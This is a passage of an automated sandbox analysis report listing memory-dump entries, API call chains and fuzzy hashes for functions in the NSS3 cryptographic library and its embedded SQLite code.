                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                              • String ID:
                                                              • API String ID: 284873373-0
                                                              • Opcode ID: 49222044693afc985239d1dc6ced681914654a036152cced891f14031bb50d04
                                                              • Instruction ID: a129b98aeb93076ce0b73b8fd5d9540db86967f074ba9d1acba3028c0eb2f394
                                                              • Opcode Fuzzy Hash: 49222044693afc985239d1dc6ced681914654a036152cced891f14031bb50d04
                                                              • Instruction Fuzzy Hash: D81196759042089FDB009F24EC48A9A3778EF49368F564065FD0497315E772ED91CBE1
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6D12F0AD,6D12F150,?,6D12F150,?,?,?), ref: 6D12ECBA
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6D12ECD1
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6D12ED02
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6D12ED5A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                              • String ID:
                                                              • API String ID: 2957673229-0
                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                              • Instruction ID: d694148b03038c3bf4e4a4da70b20488e7bb316c361625608dd7d3e0c0c63ed6
                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                              • Instruction Fuzzy Hash: B021A1B1A047469BE700CF25D944B62B7E4BFA4348F16C219E81CCB665EBB1E6D0CA90
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EDD4
                                                              • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EDFD
                                                              • PORT_Alloc_Util.NSS3(?,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EE14
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • memcpy.VCRUNTIME140(?,?,6D149767,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EE33
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                              • String ID:
                                                              • API String ID: 3903481028-0
                                                              • Opcode ID: 2c1ac9e601aba94b4a5ee489b87320ced3399b5f6adc3149325c27bc4065ebb1
                                                              • Instruction ID: 6d8c57c1223dc691547963edbcfec3f7eb9e48542c5653129d031420850b8984
                                                              • Opcode Fuzzy Hash: 2c1ac9e601aba94b4a5ee489b87320ced3399b5f6adc3149325c27bc4065ebb1
                                                              • Instruction Fuzzy Hash: D1119EF1E54716ABEB109E65DC84B16B3A8EB14358F114431EE29C6204E3B9EA70C7A1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                              • String ID:
                                                              • API String ID: 284873373-0
                                                              • Opcode ID: 5c4d84c26a3e833be434c69fdbefd13ff0b02810f6d11f508e851a638e9c030d
                                                              • Instruction ID: a3ec7a7f3f4708f6ff9d16ceed081e7eb12c51b201cb0a4e57ae9b59a240da53
                                                              • Opcode Fuzzy Hash: 5c4d84c26a3e833be434c69fdbefd13ff0b02810f6d11f508e851a638e9c030d
                                                              • Instruction Fuzzy Hash: 8E118FB5908A059BD700AF78D44826ABBF4FF45718F064969ED88D7300E730E891CBD2
                                                              APIs
                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6D165F17,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17AC94
                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6D165F17,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17ACA6
                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17ACC0
                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17ACDB
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$DestroyFreeK11_Monitor
                                                              • String ID:
                                                              • API String ID: 3989322779-0
                                                              • Opcode ID: a5be9e2d893132b964cdb68bd1abaefb292612ab150790b285f87b60489ba8ff
                                                              • Instruction ID: 956513e72c21c708176a31c34f609eeb83755625c02235cba1ffe859dec2216e
                                                              • Opcode Fuzzy Hash: a5be9e2d893132b964cdb68bd1abaefb292612ab150790b285f87b60489ba8ff
                                                              • Instruction Fuzzy Hash: B70171B1600B02ABEB60DF39E909B17B7E8BF14665B004839E85EC3A14E771F055CBD1
                                                              APIs
                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6D0E1DFB
                                                                • Part of subcall function 6D0D95B0: TlsGetValue.KERNEL32(00000000,?,6D0F00D2,00000000), ref: 6D0D95D2
                                                                • Part of subcall function 6D0D95B0: EnterCriticalSection.KERNEL32(?,?,?,6D0F00D2,00000000), ref: 6D0D95E7
                                                                • Part of subcall function 6D0D95B0: PR_Unlock.NSS3(?,?,?,?,6D0F00D2,00000000), ref: 6D0D9605
                                                              • PR_EnterMonitor.NSS3 ref: 6D0E1E09
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990AB
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990C9
                                                                • Part of subcall function 6D199090: EnterCriticalSection.KERNEL32 ref: 6D1990E5
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D199116
                                                                • Part of subcall function 6D199090: LeaveCriticalSection.KERNEL32 ref: 6D19913F
                                                                • Part of subcall function 6D0DE190: PR_EnterMonitor.NSS3(?,?,6D0DE175), ref: 6D0DE19C
                                                                • Part of subcall function 6D0DE190: PR_EnterMonitor.NSS3(6D0DE175), ref: 6D0DE1AA
                                                                • Part of subcall function 6D0DE190: PR_ExitMonitor.NSS3 ref: 6D0DE208
                                                                • Part of subcall function 6D0DE190: PL_HashTableRemove.NSS3(?), ref: 6D0DE219
                                                                • Part of subcall function 6D0DE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D0DE231
                                                                • Part of subcall function 6D0DE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D0DE249
                                                                • Part of subcall function 6D0DE190: PR_ExitMonitor.NSS3 ref: 6D0DE257
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0E1E37
                                                              • PR_ExitMonitor.NSS3 ref: 6D0E1E4A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                              • String ID:
                                                              • API String ID: 499896158-0
                                                              • Opcode ID: e94eb23f30f0cc29481b410425d20c40f0682a16ecf428d2439a4b26e2e5398a
                                                              • Instruction ID: 271bf2a1b6ec6eb6a07dec5412faa1e5ab8674d2f84b7da3eb069a2bf47157ac
                                                              • Opcode Fuzzy Hash: e94eb23f30f0cc29481b410425d20c40f0682a16ecf428d2439a4b26e2e5398a
                                                              • Instruction Fuzzy Hash: 57018475A042119FFB204B6AEC04F2777A5BB41B8CF064031F9289B351E771E810CBD2
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0E1D75
                                                              • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6D0E1D89
                                                              • PORT_ZAlloc_Util.NSS3(00000010), ref: 6D0E1D9C
                                                              • free.MOZGLUE(00000000), ref: 6D0E1DB8
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$Errorfree
                                                              • String ID:
                                                              • API String ID: 939066016-0
                                                              • Opcode ID: 3eb1566875b7bf96bab26106d15b6e5ea92120ef30c0796a667587caa05153b2
                                                              • Instruction ID: 7a79ccc682ccde580ca5840cb09289a7c66d23136bced3084db5b2ac732742a7
                                                              • Opcode Fuzzy Hash: 3eb1566875b7bf96bab26106d15b6e5ea92120ef30c0796a667587caa05153b2
                                                              • Instruction Fuzzy Hash: F2F0F9B3E0C2155BF7211F1A6C41F5B76D8AB81BD4F064275EE5987244D760E40082E3
                                                              APIs
                                                              • PK11_FreeSymKey.NSS3(?,6D165D40,00000000,?,?,6D156AC6,6D16639C), ref: 6D17AC2D
                                                                • Part of subcall function 6D11ADC0: TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE10
                                                                • Part of subcall function 6D11ADC0: EnterCriticalSection.KERNEL32(?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE24
                                                                • Part of subcall function 6D11ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6D0FD079,00000000,00000001), ref: 6D11AE5A
                                                                • Part of subcall function 6D11ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE6F
                                                                • Part of subcall function 6D11ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE7F
                                                                • Part of subcall function 6D11ADC0: TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEB1
                                                                • Part of subcall function 6D11ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEC9
                                                              • PK11_FreeSymKey.NSS3(?,6D165D40,00000000,?,?,6D156AC6,6D16639C), ref: 6D17AC44
                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6D165D40,00000000,?,?,6D156AC6,6D16639C), ref: 6D17AC59
                                                              • free.MOZGLUE(8CB6FF01,6D156AC6,6D16639C,?,?,?,?,?,?,?,?,?,6D165D40,00000000,?,6D16AAD4), ref: 6D17AC62
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                              • String ID:
                                                              • API String ID: 1595327144-0
                                                              • Opcode ID: 815a6c5283d711a8d5e8b54df369f39071b919f90de3d58273fcf59d9acb66fe
                                                              • Instruction ID: 2d8348d0b347d80bb86495d736d838f8562f6f800df43b33b5e35bd61ca918b3
                                                              • Opcode Fuzzy Hash: 815a6c5283d711a8d5e8b54df369f39071b919f90de3d58273fcf59d9acb66fe
                                                              • Instruction Fuzzy Hash: F5018BB5604600AFDF10CF14E8C0F167BA8AF54718F0880A8E94D8F30AE771E844CBA2
                                                              APIs
                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D0D9003,?), ref: 6D12FD91
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PORT_Alloc_Util.NSS3(A4686D13,?), ref: 6D12FDA2
                                                              • memcpy.VCRUNTIME140(00000000,12D068C3,A4686D13,?,?), ref: 6D12FDC4
                                                              • free.MOZGLUE(00000000,?,?), ref: 6D12FDD1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 2335489644-0
                                                              • Opcode ID: 883f971e1aa969ab6011c807e076e90135b3c37347f9d253edc76e68ecea0ab5
                                                              • Instruction ID: bd114a8a51067ed69320398f7e9b4dd1958fd9ef98918956eff2e4bc670ea690
                                                              • Opcode Fuzzy Hash: 883f971e1aa969ab6011c807e076e90135b3c37347f9d253edc76e68ecea0ab5
                                                              • Instruction Fuzzy Hash: F8F0FCF66042175BEB004F56EC819277798EF54695F058034FD1D8B649E7B2DC50C7E1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalDeleteSectionfree
                                                              • String ID:
                                                              • API String ID: 2988086103-0
                                                              • Opcode ID: 20ea046db9a30fcb0c946b652bb20baa280df2279bf6d8f4f9b5e0364b70c6bb
                                                              • Instruction ID: 1b7b0f121cdf0ee280a2894ef53bdc56c07192cd8a6d6b5e0a5cf242c380dd3a
                                                              • Opcode Fuzzy Hash: 20ea046db9a30fcb0c946b652bb20baa280df2279bf6d8f4f9b5e0364b70c6bb
                                                              • Instruction Fuzzy Hash: 33E039B6600608ABCE10DFA8DC8888B77ACEE8A6743150665FA91C3700D332F915CBE1
                                                              APIs
                                                              • sqlite3_value_text.NSS3 ref: 6D0C9E1F
                                                                • Part of subcall function 6D0813C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6D052352,?,00000000,?,?), ref: 6D081413
                                                                • Part of subcall function 6D0813C0: memcpy.VCRUNTIME140(00000000,6D052352,00000002,?,?,?,?,6D052352,?,00000000,?,?), ref: 6D0814C0
                                                              Strings
                                                              • ESCAPE expression must be a single character, xrefs: 6D0C9F78
                                                              • LIKE or GLOB pattern too complex, xrefs: 6D0CA006
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: memcpysqlite3_value_textstrlen
                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                              • API String ID: 2453365862-264706735
                                                              • Opcode ID: daeb9925797b74c3d67c29f85a10f6a1dbffe46b8ae0d1a4ae8b5273af5b02c1
                                                              • Instruction ID: 8bc5d7cd02ed46bd4dea64535f66eceb8e8282d1f877538ea5b1fc3d138c169c
                                                              • Opcode Fuzzy Hash: daeb9925797b74c3d67c29f85a10f6a1dbffe46b8ae0d1a4ae8b5273af5b02c1
                                                              • Instruction Fuzzy Hash: 9B81E571A042568BFB00CF29D0803BEB7F2AF8531EF158659D8A88B385D736D943C792
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D124D57
                                                              • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6D124DE6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ErrorR_snprintf
                                                              • String ID: %d.%d
                                                              • API String ID: 2298970422-3954714993
                                                              • Opcode ID: 4b4bb53be7d1240a73bc2d496f61cb909a1dfe65d4d451454fc74d80ffcbe385
                                                              • Instruction ID: f3447e0b38b016475fb0d5838e3c0f16a7475e218d6855d3c9494f24a8c0bd86
                                                              • Opcode Fuzzy Hash: 4b4bb53be7d1240a73bc2d496f61cb909a1dfe65d4d451454fc74d80ffcbe385
                                                              • Instruction Fuzzy Hash: FF314CB1D0421D6BFB109BB09C05BBF7768EF64304F050428FE059B285EBB19945CBA2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$calloc
                                                              • String ID:
                                                              • API String ID: 3339632435-0
                                                              • Opcode ID: fb43e7d8d4bdb3869d6e71ec82e58a828ef400ac859cf8dc4b0c9759c613c07c
                                                              • Instruction ID: f4865698fd140a862449eeb7c83267a631926685c71e7593a7dbfb0da51536a0
                                                              • Opcode Fuzzy Hash: fb43e7d8d4bdb3869d6e71ec82e58a828ef400ac859cf8dc4b0c9759c613c07c
                                                              • Instruction Fuzzy Hash: E231F6B07987258BEB115F7AD48836A77F4BF46388F03467DD89887214DBB48084CB82